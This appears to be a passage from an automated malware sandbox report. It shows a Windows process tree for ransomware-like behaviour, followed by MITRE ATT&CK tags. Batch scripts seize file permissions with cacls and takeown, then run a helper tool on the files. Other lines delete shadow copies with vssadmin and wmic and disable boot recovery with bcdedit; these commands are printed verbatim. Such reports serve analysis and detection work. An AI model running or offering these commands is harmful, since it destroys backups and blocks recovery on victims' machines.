C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵
- Modifies file permissions
PID:1084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:396
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵PID:1920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵
- Modifies file permissions
PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:788
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:832
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F84BC67E-6052-463D-8A2B-16237B0CC6D1} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]1⤵PID:1892
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\9Tln0auk.bat"2⤵PID:2044
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1836
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1444
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:968
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1068
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1872
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3